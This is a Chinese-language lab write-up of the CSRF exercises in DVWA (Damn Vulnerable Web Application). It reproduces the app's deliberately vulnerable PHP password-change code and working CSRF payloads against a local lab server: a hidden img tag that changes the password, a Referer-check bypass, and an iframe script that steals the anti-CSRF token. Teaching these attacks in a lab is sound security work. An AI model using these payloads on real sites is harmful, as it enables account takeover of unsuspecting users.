讲在前面
CSRF(Cross-Site Request Forgery):跨站点请求伪造。
完全一次CSRF攻击需要具备以下条件:
- 受害者拥有未失效的身份认真信息(例如cookie等)
- 受害者点击了含有攻击代码的网站连接
具备这两个条件,攻击者就可以冒充受害者的身份想服务器发起请求,完成一些非法操作,例如修改密码等。
一、Low
1.1 服务器代码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
代码十分简单,就是在接收输入值之后,验证两次密码的输入是否相同,若相同则用md5散列之后直接写入数据库,完成密码修改。
这里有一点需要提一下,在一开始登录的时候,已经生成并保存了cookie信息,这里的代码没有体现cookie的生成。
1.2 漏洞利用
上面提到,实现这个攻击需要两个东西:有效的身份认证信息和恶意链接。身份认证在登录的时候生成了cookie,所以我们还需要构造恶意链接,这里的我们的恶意链接的目的是修改密码。
对于恶意链接的构造也有几个要求:
首先,不要让受害者一眼就看出是恶意链接以及链接的目的,例如以下链接
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
一眼就看得出点下去就会修改密码,稍微有点网络知识的人肯定不会点的。
对于这个问题,可以用短链接来隐藏真正的URL(但是对于IP域名的URL无法生成短链接)。但是,即使URL被隐藏,点下去之后也会跳转到修改密码成功页面,受害者马上就知道自己被攻击了。
为了不让受害者那么快就发现自己被攻击,我们还需要设计一个跳转网页。在实际操作中,这个跳转网页是需要放在公网的,否则受害者无法成功访问该网页,而且这个网页还需要专门设计,让受害者不会对跳转网页产生怀疑。这里我就只是简单做了一个网页而已,网页代码如下:
<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
<h1>hacked!<h1>
这里将恶意链接隐藏在img标签里面,只要用户点击进入这个页面,就会自动执行恶意链接。
二、Medium
2.1 服务器代码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
与Low级别相比,Medium多了个stripos()函数进行校验。即检查了HTTP_REFERER字段的值是否包含了SERVER_NAME字段的值,若不包含则会直接丢包。
- stripos()函数:查找字符串在另一字符串中第一次出现的位置(不区分大小写),若没有出现则返回false
- HTTP_Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
- SERVER_NAME即主机名,一般情况下就是Host字段的值
也就是说,你存放钓鱼网页的网站域名(即Referer里面的域名)和真实的域名(即SERVER_NAME的值)需要一致,才可以验证通过(理论上)。
PS
一开始无论攻击机还是服务器都是搭建在同一个虚拟机,这样子的Host和Referer就会一样,相当于把钓鱼网页放在了真实的服务器里面,这样就失去了这个实验的意义,于是就多搭建了一个服务器作为靶机。然后钓鱼网页里面的链接也要相应的改成服务器的IP地址(懒得配置域名了)。而前面的东西我也懒得改了,后面的实验也是按两台虚拟机来做的。
2.2 漏洞利用
实际上,服务器只检查Referer的值,是否包含了SERVER_NAME的值而已,而Referer的值是可操控的,我们可以把网页的文件名改为真实服务器的域名,这样就可以符合服务器的检验。
使用bp抓包验证结果可以看到,修改了文件名就可以成功绕过验证规则。
三、High
3.1 服务器代码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>
在Hight等级中,加入了token机制,每次访问修改密码界面的时候,服务器都会返回一个token值,之后的每个请求,都要带上token值给服务器验证,验证通过之后才会响应请求。
3.2 漏洞利用
绕过token机制,关键在于获取token值,所以钓鱼网页的设计思路是:
先用一个iframe请求获得token值,之后再发起改密请求。
<script type="text/javascript">
function attack(){
document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
document.getElementById("transfer").submit();
}
</script>
<iframe src="http://192.168.235.4/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>
<body onload="attack()">
<form method="GET" id="transfer" action="http://192.168.235.4/dvwa/vulnerabilities/csrf">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_conf" value="password">
<input type="hidden" name="user_token" value="">
<input type="hidden" name="Change" value="Change">
</form>
</body>
不过这么做有一个很大的问题,就是现在的浏览器都不允许跨域请求,因此单纯用CSRF方法是无法获取token值的,一般需要配合XSS,这点等后面了解XSS的时候再进行尝试。
四、Impossible
4.1 服务器代码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_curr = $_GET[ 'password_current' ];
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Sanitise current password input
$pass_curr = stripslashes( $pass_curr );
$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_curr = md5( $pass_curr );
// Check that the current password is correct
$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
$data->execute();
// Do both new passwords match and does the current password match the user?
if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
// It does!
$pass_new = stripslashes( $pass_new );
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database with new password
$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
$data->execute();
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match or current password incorrect.</pre>";
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
Impossible等级在High的基础上,加入了对旧密码的验证,所以只要不知道旧密码就无法成功改密码。
五、最后说点废话
有一个很现实的问题就是,不少人是因为忘记了旧密码而需要改密码,因此Impossible等级所设置的防御机制在现实中并不人性化。现实中往往通过其他方式进行身份验证,例如短信验证码、邮件验证码等。